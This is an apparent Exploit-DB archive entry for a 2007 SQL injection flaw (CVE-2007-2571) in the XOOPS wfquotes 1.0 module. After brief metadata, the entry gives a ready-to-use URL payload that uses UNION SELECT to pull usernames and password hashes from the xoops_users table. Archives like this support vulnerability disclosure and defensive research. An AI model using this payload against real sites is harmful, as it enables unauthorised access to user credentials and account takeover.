XOOPS Module wfquotes 1.0 - Remote SQL Injection Vulnerability

2007-05-06T00:00:00
ID EDB-ID:3862
Type exploitdb
Reporter Mehmet Ince
Modified 2007-05-06T00:00:00

Description

XOOPS Module wfquotes 1.0 0 Remote SQL Injection Vulnerability. CVE-2007-2571. Webapps exploit for php platform

                                        
                                            =================================================
+
+ Xoops wfquotes module v1.0 0 Remote Blind SQL Injection
+
=================================================
+
+ Bulan: Cyber-Ssecurity
+
=================================================
+
+ Exploit:
+ /modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*
+
=================================================

# milw0rm.com [2007-05-06]